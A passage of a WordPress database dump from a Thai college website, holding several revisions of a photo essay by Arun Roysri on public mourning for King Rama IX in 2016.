size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"></p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:57:52', '2018-11-12 07:57:52', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4401, 3, '2018-11-12 14:59:58', '2018-11-12 07:59:58', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4317\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:59:58', '2018-11-12 07:59:58', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4402, 3, '2018-11-12 15:01:37', '2018-11-12 08:01:37', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: 